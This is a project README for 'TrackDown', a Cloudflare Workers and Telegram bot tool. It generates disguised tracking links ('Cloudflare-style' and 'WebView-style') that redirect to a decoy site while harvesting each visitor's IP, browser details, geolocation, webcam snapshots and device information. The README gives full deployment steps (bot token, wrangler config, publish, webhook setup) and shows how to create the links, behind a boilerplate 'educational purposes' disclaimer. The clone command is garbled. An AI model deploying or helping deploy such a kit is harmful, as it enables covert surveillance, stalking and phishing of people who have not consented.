TrackDown is a serverless, privacy-focused intelligence tool powered by Cloudflare Workers. It allows you to generate custom tracking links that gather device data (like IP address, browser details, geolocation, and more) and send it directly to a connected Telegram bot.
⚠️ Intended strictly for educational and research purposes only. Misuse is prohibited.
- 🔗 Generate two types of tracking links (Cloudflare-style and WebView-style)
- 🌐 Collect IP, user-agent, screen size, and device information
- 📍 Gather geolocation data (with permission)
- 📸 Capture webcam snapshots (with permission)
- 🔋 Detect battery and network status
- 📦 Detect connected media and USB devices (if permissions granted)
- 🤖 Auto-send collected data to your Telegram bot
- ✅ Telegram account
- ✅ Cloudflare account
- ✅ Wrangler CLI
- ✅ Basic knowledge of serverless deployment
- Open Telegram and search for @BotFather
- Run
/newbotand follow the prompts - Save your Bot Token (you’ll use this later)
git clone [https://github.com/your-username/trackdown](https://github.com/jbalagiya/TrackDown-V2.git
cd TrackDown-V2Update the wrangler.toml file:
[vars]
TELEGRAM_BOT_TOKEN = "your_bot_token_here"
HOST_URL = "https://trackdown.your-subdomain.workers.dev"Then:
wrangler publishAfter deployment, open this URL in your browser:
https://your-worker-url.workers.dev/setup-webhook
You should see:
✅ Webhook Setup Successful
| Command | Description |
|---|---|
/start |
Start bot and get basic instructions |
/help |
Show all commands and usage info |
/create |
Generate new tracking link |
- Send
/createto your bot - Enter a destination URL (e.g.
https://google.com) - Receive:
- ✅
Cloudflare Pagelink - ✅
WebView Pagelink
- ✅
- Public IP Address
- User Agent (OS, Browser)
- Screen Resolution & Language
- Geolocation (with permission)
- Webcam Snapshot (with permission)
- Battery Status & Network Type
- Connected Cameras/Microphones
- USB Devices (if granted)
You: /create
Bot: Enter your destination URL
You: https://example.com
Bot:
✅ Tracking links generated:
🌐 Cloudflare: https://your-worker.workers.dev/c/xxx/yyyyy
🔍 WebView: https://your-worker.workers.dev/w/xxx/yyyyy
- Check bot token in
wrangler.toml - Confirm Worker URL is deployed
- Visit
/setup-webhookagain
- Check browser permission settings
- Use HTTPS links only
- Monitor Cloudflare Worker logs for errors
- Keep your
TELEGRAM_BOT_TOKENprivate - Do not expose your worker link publicly
- Log and audit access regularly
This tool is developed for educational and ethical cybersecurity purposes only. You are solely responsible for how you use this software. Do not use it to violate privacy, hack individuals, or bypass user consent.
👨💻 Developed by: jbalagiya
If you found this project helpful or interesting, consider supporting my work: